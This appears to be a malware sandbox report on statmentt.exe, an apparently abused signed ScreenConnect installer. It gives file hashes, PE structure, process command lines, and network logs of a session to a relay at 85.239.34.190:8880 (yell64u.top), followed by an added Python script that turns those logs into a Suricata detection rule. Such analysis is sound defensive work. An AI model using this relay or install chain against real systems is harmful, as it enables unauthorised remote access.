Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Preview: binary (all 512 bytes are non-printable and rendered as '.')

Process: C:\Windows\System32\msiexec.exe
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 32768
Entropy (8bit): 1.4175101841856552
Encrypted: false
SSDEEP: 48:b4bu1I+xFX4JT5hUZh9ptwyuZaqcq56AduNSiA1dZq+ommXrz4UVRosr2AduNSID:MbYKTX4ruhpYf6dwLmm349H
MD5: CF63184C2D8E55006E1C6FB521F26C5A
SHA1: A2DE323548DAB9F531A3A5BB2D35AA68535BB45F
SHA-256: A0F2AA0E9A3640465D6ABB9A4AF41944D20D6D616A33DC145BA1D1A7F810F90A
SHA-512: 499002D79911987B7844001EC09102079D089D83A973D922C2289154C68785EB1A0ACD80836481CE2B29406AA1E6FC717A2767401626349E8EA3292627351A1A
Malicious: false
Preview: binary (non-printable bytes rendered as '.'; only a single '>' near the start of the Compound File header is printable)

Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.06926595183858525
Encrypted: false
SSDEEP: 6:2/9LG7iVCnLG7iVrKOzPLHKOzOVsnq69GyVky6l3X:2F0i8n0itFzDHFi6nq+E3X
MD5: FC67E3713EC7722E3B0FA16D60249A5E
SHA1: 3CA1CB744384C7B903D67F0655E065D319428761
SHA-256: 85C08858214E6F9E59494EA6193C7F8D1F5974FD290681A8A1A2E29DEADB6990
SHA-512: 4BBDD9D31F70ACD683D5B2DAA7638543BCDEF5DDA3645DC72EAA8076C7CACA749BD245ACEA66AE05D4D38D70E2FDEDF5412446842F3E5BB6840F482481880804
Malicious: false
Preview: binary (every byte in the shown prefix is non-printable and rendered as '.')

Process: C:\Windows\System32\msiexec.exe
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 20480
Entropy (8bit): 1.796581217563304
Encrypted: false
SSDEEP: 48:r8PhDuRc06WX4ujT5Gh9ptwyuZaqcq56AduNSiA1dZq+ommXrz4UVRosr2AduNSK:ShD1ejTGruhpYf6dwLmm349H
MD5: CC2ADC2329B5D81AE3EDBAB92BACB16B
SHA1: D69DD4BA7C4B5619EA4F7419ECD6C5BAC6F8E369
SHA-256: 3DA7EC8475AED1626F7552EED5A3BECCA51D796A11B0B95039F16811DB9AE40D
SHA-512: 0517C84494ECD85C8B4C24C1A994AEED2DD8CE9D085C8E2F659FD5AF1617483D157DDFEF50BF4F32079097C6E7740DA37E33424694F4567BC9A0467CD7B21BE3
Malicious: false
Preview: binary (non-printable bytes rendered as '.'; only a single '>' near the start of the Compound File header is printable)

Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Preview: binary (all 512 bytes are non-printable and rendered as '.')

Process: C:\Windows\System32\msiexec.exe
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 32768
Entropy (8bit): 1.4175101841856552
Encrypted: false
SSDEEP: 48:b4bu1I+xFX4JT5hUZh9ptwyuZaqcq56AduNSiA1dZq+ommXrz4UVRosr2AduNSID:MbYKTX4ruhpYf6dwLmm349H
MD5: CF63184C2D8E55006E1C6FB521F26C5A
SHA1: A2DE323548DAB9F531A3A5BB2D35AA68535BB45F
SHA-256: A0F2AA0E9A3640465D6ABB9A4AF41944D20D6D616A33DC145BA1D1A7F810F90A
SHA-512: 499002D79911987B7844001EC09102079D089D83A973D922C2289154C68785EB1A0ACD80836481CE2B29406AA1E6FC717A2767401626349E8EA3292627351A1A
Malicious: false
Preview: binary (non-printable bytes rendered as '.'; only a single '>' near the start of the Compound File header is printable)

Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Preview: binary (all 512 bytes are non-printable and rendered as '.')

Process: C:\Windows\System32\msiexec.exe
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 20480
Entropy (8bit): 1.796581217563304
Encrypted: false
SSDEEP: 48:r8PhDuRc06WX4ujT5Gh9ptwyuZaqcq56AduNSiA1dZq+ommXrz4UVRosr2AduNSK:ShD1ejTGruhpYf6dwLmm349H
MD5: CC2ADC2329B5D81AE3EDBAB92BACB16B
SHA1: D69DD4BA7C4B5619EA4F7419ECD6C5BAC6F8E369
SHA-256: 3DA7EC8475AED1626F7552EED5A3BECCA51D796A11B0B95039F16811DB9AE40D
SHA-512: 0517C84494ECD85C8B4C24C1A994AEED2DD8CE9D085C8E2F659FD5AF1617483D157DDFEF50BF4F32079097C6E7740DA37E33424694F4567BC9A0467CD7B21BE3
Malicious: false
Preview: binary (non-printable bytes rendered as '.'; only a single '>' near the start of the Compound File header is printable)

Process: C:\Windows\System32\msiexec.exe
File Type: data
Category: dropped
Size (bytes): 512
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: BF619EAC0CDF3F68D496EA9344137E8B
SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
Preview: binary (all 512 bytes are non-printable and rendered as '.')
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):512
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                            Malicious:false
                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                            Category:dropped
                                                                                            Size (bytes):32768
                                                                                            Entropy (8bit):1.4175101841856552
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:b4bu1I+xFX4JT5hUZh9ptwyuZaqcq56AduNSiA1dZq+ommXrz4UVRosr2AduNSID:MbYKTX4ruhpYf6dwLmm349H
                                                                                            MD5:CF63184C2D8E55006E1C6FB521F26C5A
                                                                                            SHA1:A2DE323548DAB9F531A3A5BB2D35AA68535BB45F
                                                                                            SHA-256:A0F2AA0E9A3640465D6ABB9A4AF41944D20D6D616A33DC145BA1D1A7F810F90A
                                                                                            SHA-512:499002D79911987B7844001EC09102079D089D83A973D922C2289154C68785EB1A0ACD80836481CE2B29406AA1E6FC717A2767401626349E8EA3292627351A1A
                                                                                            Malicious:false
                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.4294865097622065
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:statmentt.exe
                                                                                            File size:5'652'448 bytes
                                                                                            MD5:054251d2e1de783b0faed842d64fd893
                                                                                            SHA1:3e23d7c2777644dbe519b365d5e9cb80bfe3d402
                                                                                            SHA256:e1a3eb6e1ec31406443bfbe5067c1852706406a824a29c2490c8e1b73fcf0081
                                                                                            SHA512:480dfb06bc061d908962365eb66e1ded4f064b4f825190102d5f0a30458837e18d81e552098d519a08bbb92fb545fd675f1d3a3de38574707d0740c54dba32c3
                                                                                            SSDEEP:49152:IDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfoi:c4s6efPQ53JLbd3LINMLaGUW39f0
                                                                                            TLSH:6C46E111B3D995B9C0BF063CD87A52699A74BC048722C7AF57D4BD292D32BC05E323B6
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                                            Icon Hash:90cececece8e8eb0
                                                                                            Entrypoint:0x4014ad
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                            Signature Valid:true
                                                                                            Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                            Signature Validation Error:The operation completed successfully
                                                                                            Error Number:0
Validity (Not Before, Not After):
• 17/08/2022 01:00:00 to 16/08/2025 00:59:59
                                                                                            Subject Chain
                                                                                            • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                            Version:3
                                                                                            Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                            Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                            Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                            Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                            Instruction
                                                                                            call 00007F44F056D75Ah
                                                                                            jmp 00007F44F056D20Fh
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push 00000000h
                                                                                            call dword ptr [0040D040h]
                                                                                            push dword ptr [ebp+08h]
                                                                                            call dword ptr [0040D03Ch]
                                                                                            push C0000409h
                                                                                            call dword ptr [0040D044h]
                                                                                            push eax
                                                                                            call dword ptr [0040D048h]
                                                                                            pop ebp
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 00000324h
                                                                                            push 00000017h
                                                                                            call dword ptr [0040D04Ch]
                                                                                            test eax, eax
                                                                                            je 00007F44F056D397h
                                                                                            push 00000002h
                                                                                            pop ecx
                                                                                            int 29h
                                                                                            mov dword ptr [004148D8h], eax
                                                                                            mov dword ptr [004148D4h], ecx
                                                                                            mov dword ptr [004148D0h], edx
                                                                                            mov dword ptr [004148CCh], ebx
                                                                                            mov dword ptr [004148C8h], esi
                                                                                            mov dword ptr [004148C4h], edi
                                                                                            mov word ptr [004148F0h], ss
                                                                                            mov word ptr [004148E4h], cs
                                                                                            mov word ptr [004148C0h], ds
                                                                                            mov word ptr [004148BCh], es
                                                                                            mov word ptr [004148B8h], fs
                                                                                            mov word ptr [004148B4h], gs
                                                                                            pushfd
                                                                                            pop dword ptr [004148E8h]
                                                                                            mov eax, dword ptr [ebp+00h]
                                                                                            mov dword ptr [004148DCh], eax
                                                                                            mov eax, dword ptr [ebp+04h]
                                                                                            mov dword ptr [004148E0h], eax
                                                                                            lea eax, dword ptr [ebp+08h]
                                                                                            mov dword ptr [004148ECh], eax
                                                                                            mov eax, dword ptr [ebp-00000324h]
                                                                                            mov dword ptr [00414828h], 00010001h
                                                                                            Programming Language:
                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x129c4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x533080 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x546200 | 0x1dde0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x54a000 | 0xea8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11f20 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x11e60 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb1af | 0xb200 | d9fa6da0baf4b869720be833223490cb | False | 0.6123156601123596 | data | 6.592039633797327 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x6078 | 0x6200 | 8b45a1035c0de72f910a75db7749f735 | False | 0.41549744897959184 | data | 4.786621464556291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x14000 | 0x11e4 | 0x800 | 1f4cc86b6735a74429c9d1feb93e2871 | False | 0.18310546875 | data | 2.265083745848167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x16000 | 0x533080 | 0x533200 | 0cb59c276652808eb7200fdad38bae5b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x54a000 | 0xea8 | 0x1000 | a93b0f39998e1e69e5944da8c5ff06b1 | False | 0.72265625 | data | 6.301490309336801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
FILES | 0x163d8 | 0x86000 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.39622565881529853
FILES | 0x9c3d8 | 0x1a4600 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.5111637115478516
FILES | 0x2409d8 | 0x1ac00 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.4415614047897196
FILES | 0x25b5d8 | 0x2ec320 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.9812068939208984
FILES | 0x5478f8 | 0x1600 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3908025568181818
RT_MANIFEST | 0x548ef8 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
DLL | Import
mscoree.dll | CorBindToRuntimeEx
KERNEL32.dll | GetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
OLEAUT32.dll | VariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 17:29:15.967503071 CET | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Dec 19, 2024 17:29:16.087486982 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Dec 19, 2024 17:29:16.087635994 CET | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Dec 19, 2024 17:29:17.132167101 CET | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Dec 19, 2024 17:29:17.252325058 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Dec 19, 2024 17:29:17.568722010 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Dec 19, 2024 17:29:17.605510950 CET | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Dec 19, 2024 17:29:17.725555897 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Dec 19, 2024 17:29:18.056612015 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Dec 19, 2024 17:29:18.156790972 CET | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Dec 19, 2024 17:29:18.248184919 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Dec 19, 2024 17:29:18.344376087 CET | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Dec 19, 2024 17:29:19.506140947 CET | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Dec 19, 2024 17:29:19.506520033 CET | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Dec 19, 2024 17:29:19.626833916 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Dec 19, 2024 17:29:19.626878977 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Dec 19, 2024 17:29:19.626909971 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Dec 19, 2024 17:29:19.626938105 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Dec 19, 2024 17:29:19.626972914 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Dec 19, 2024 17:29:20.424957991 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Dec 19, 2024 17:29:20.547399044 CET | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Dec 19, 2024 17:30:20.438169003 CET | 49731 | 8880 | 192.168.2.4 | 85.239.34.190
Dec 19, 2024 17:30:20.558125019 CET | 8880 | 49731 | 85.239.34.190 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 17:29:15.387605906 CET | 62809 | 53 | 192.168.2.4 | 1.1.1.1
Dec 19, 2024 17:29:15.934417009 CET | 53 | 62809 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 17:29:15.387605906 CET | 192.168.2.4 | 1.1.1.1 | 0xf51a | Standard query (0) | yell64u.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 17:29:15.934417009 CET | 1.1.1.1 | 192.168.2.4 | 0xf51a | No error (0) | yell64u.top | | 85.239.34.190 | A (IP address) | IN (0x0001) | false
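The TCP and DNS tables above are the report's only network evidence: a single session from the sandbox host 192.168.2.4 to 85.239.34.190 on TCP 8880, and one DNS answer that maps yell64u.top to that address. The Python script below is an added example, not part of the Joe Sandbox report, that turns those rows into indicators a responder can act on. It parses the rows (transcribed from the table with a space between the columns), attributes the remote endpoint to its domain through the DNS answer, counts packets per direction, measures the longest silence in the session (the roughly 60-second gap between the packet at 17:29:20 and the next at 17:30:20, which reads as a keepalive interval), flags the non-standard destination port, and emits a Suricata-style alert rule. The STANDARD_PORTS set, the $HOME_NET variable and the sid values are assumptions for illustration, not values from the report.

```python
import re
from datetime import datetime, timedelta

# Transcribed from this report's TCP table (Timestamp, Source Port, Dest Port,
# Source IP, Dest IP), one space between the columns the page fuses together.
TCP_ROWS = """\
Dec 19, 2024 17:29:15.967503071 CET 49731 8880 192.168.2.4 85.239.34.190
Dec 19, 2024 17:29:16.087486982 CET 8880 49731 85.239.34.190 192.168.2.4
Dec 19, 2024 17:29:16.087635994 CET 49731 8880 192.168.2.4 85.239.34.190
Dec 19, 2024 17:29:17.132167101 CET 49731 8880 192.168.2.4 85.239.34.190
Dec 19, 2024 17:29:17.252325058 CET 8880 49731 85.239.34.190 192.168.2.4
Dec 19, 2024 17:29:17.568722010 CET 8880 49731 85.239.34.190 192.168.2.4
Dec 19, 2024 17:29:17.605510950 CET 49731 8880 192.168.2.4 85.239.34.190
Dec 19, 2024 17:29:17.725555897 CET 8880 49731 85.239.34.190 192.168.2.4
Dec 19, 2024 17:29:18.056612015 CET 8880 49731 85.239.34.190 192.168.2.4
Dec 19, 2024 17:29:18.156790972 CET 49731 8880 192.168.2.4 85.239.34.190
Dec 19, 2024 17:29:18.248184919 CET 8880 49731 85.239.34.190 192.168.2.4
Dec 19, 2024 17:29:18.344376087 CET 49731 8880 192.168.2.4 85.239.34.190
Dec 19, 2024 17:29:19.506140947 CET 49731 8880 192.168.2.4 85.239.34.190
Dec 19, 2024 17:29:19.506520033 CET 49731 8880 192.168.2.4 85.239.34.190
Dec 19, 2024 17:29:19.626833916 CET 8880 49731 85.239.34.190 192.168.2.4
Dec 19, 2024 17:29:19.626878977 CET 8880 49731 85.239.34.190 192.168.2.4
Dec 19, 2024 17:29:19.626909971 CET 8880 49731 85.239.34.190 192.168.2.4
Dec 19, 2024 17:29:19.626938105 CET 8880 49731 85.239.34.190 192.168.2.4
Dec 19, 2024 17:29:19.626972914 CET 8880 49731 85.239.34.190 192.168.2.4
Dec 19, 2024 17:29:20.424957991 CET 8880 49731 85.239.34.190 192.168.2.4
Dec 19, 2024 17:29:20.547399044 CET 49731 8880 192.168.2.4 85.239.34.190
Dec 19, 2024 17:30:20.438169003 CET 49731 8880 192.168.2.4 85.239.34.190
Dec 19, 2024 17:30:20.558125019 CET 8880 49731 85.239.34.190 192.168.2.4
"""
# Name -> address, from the report's DNS answer table.
DNS_ANSWERS = {"yell64u.top": "85.239.34.190"}

ROW_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) \w+ "
    r"(?P<sport>\d+) (?P<dport>\d+) (?P<src>[\d.]+) (?P<dst>[\d.]+)$")
# Assumption: ports treated as "standard" for outbound web/remote-access traffic.
STANDARD_PORTS = {80, 443, 8080, 8443}


def parse_tcp(text):
    """Turn the report's rows into dicts with a datetime and integer ports."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        ts = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
        ts += timedelta(microseconds=int(m["frac"][:6].ljust(6, "0")))
        rows.append({"ts": ts, "sport": int(m["sport"]), "dport": int(m["dport"]),
                     "src": m["src"], "dst": m["dst"]})
    return rows


def summarize(rows, dns_answers, local_prefix="192.168.2."):
    """Group packets by remote (ip, port) and attach DNS names and timing facts."""
    summary = {}
    for r in rows:
        outbound = r["src"].startswith(local_prefix)
        remote = (r["dst"], r["dport"]) if outbound else (r["src"], r["sport"])
        s = summary.setdefault(remote, {"outbound": 0, "inbound": 0, "ts": []})
        s["outbound" if outbound else "inbound"] += 1
        s["ts"].append(r["ts"])
    for (ip, port), s in summary.items():
        ts = sorted(s.pop("ts"))
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        s.update(first_seen=ts[0], last_seen=ts[-1],
                 max_gap_s=max(gaps) if gaps else 0.0,  # longest silence: keepalive hint
                 non_standard_port=port not in STANDARD_PORTS,
                 domains=sorted(n for n, a in dns_answers.items() if a == ip))
    return summary


def suricata_rules(summary, sid_base=1000001):
    """One alert per remote endpoint; sid values are placeholders, not registered IDs."""
    rules = []
    for i, ((ip, port), s) in enumerate(sorted(summary.items())):
        name = s["domains"][0] if s["domains"] else ip
        rules.append(f'alert tcp $HOME_NET any -> {ip} {port} '
                     f'(msg:"statmentt.exe ScreenConnect relay {name}:{port}"; '
                     f'flow:to_server,established; sid:{sid_base + i}; rev:1;)')
    return rules


if __name__ == "__main__":
    result = summarize(parse_tcp(TCP_ROWS), DNS_ANSWERS)
    for (ip, port), s in result.items():
        print(f"{ip}:{port} {s['domains']} out={s['outbound']} in={s['inbound']} "
              f"max_gap={s['max_gap_s']:.1f}s non_standard_port={s['non_standard_port']}")
    print("\n".join(suricata_rules(result)))
```

Run as-is, the script reports one endpoint, 85.239.34.190:8880, attributed to yell64u.top, with ten outbound and thirteen inbound packets and a longest gap of about 59.9 seconds. Only the DNS answer ties the domain to the address, so the rule blocks or alerts on the IP and port; if the relay moves, the domain remains the more durable indicator.
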


                                                                                            Target ID:0
                                                                                            Start time:11:29:07
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Users\user\Desktop\statmentt.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\statmentt.exe"
                                                                                            Imagebase:0xbc0000
                                                                                            File size:5'652'448 bytes
                                                                                            MD5 hash:054251D2E1DE783B0FAED842D64FD893
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1802003851.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1785575924.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:11:29:09
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                                                                                            Imagebase:0x1c0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
